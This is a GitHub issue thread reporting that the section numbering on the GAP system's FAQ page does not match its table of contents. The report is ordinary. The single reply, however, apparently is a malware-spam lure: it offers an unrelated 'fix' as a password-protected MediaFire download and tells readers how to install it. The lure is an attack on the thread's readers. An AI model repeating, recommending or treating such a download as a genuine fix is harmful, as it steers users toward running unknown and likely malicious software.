### ISSUE TITLE
FAQ numbering is inconsistent with table of contents

### ISSUE THREAD

**Issue by Joseph-Edwards** [gap-system/GapWWW#364]
The table of contents on the FAQ page begins:
> 1. Obtaining GAP
    a. Can I obtain the algorithm and/or code for some function of GAP?
    b. How do I find my way through the GAP Library?

however, when you follow the links in the table of contents, you see:
> ## 2 Obtaining GAP
> ### 2.1 Can I obtain the algorithm and/or code for some function of GAP?

Should this instead say:
> ## 1. Obtaining GAP
> ### 1.a Can I obtain the algorithm and/or code for some function of GAP?

I.e. the numbering begins at 1, and sub-lists are indexed a, b ,c ... ?

**Comment by goncastrum** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx
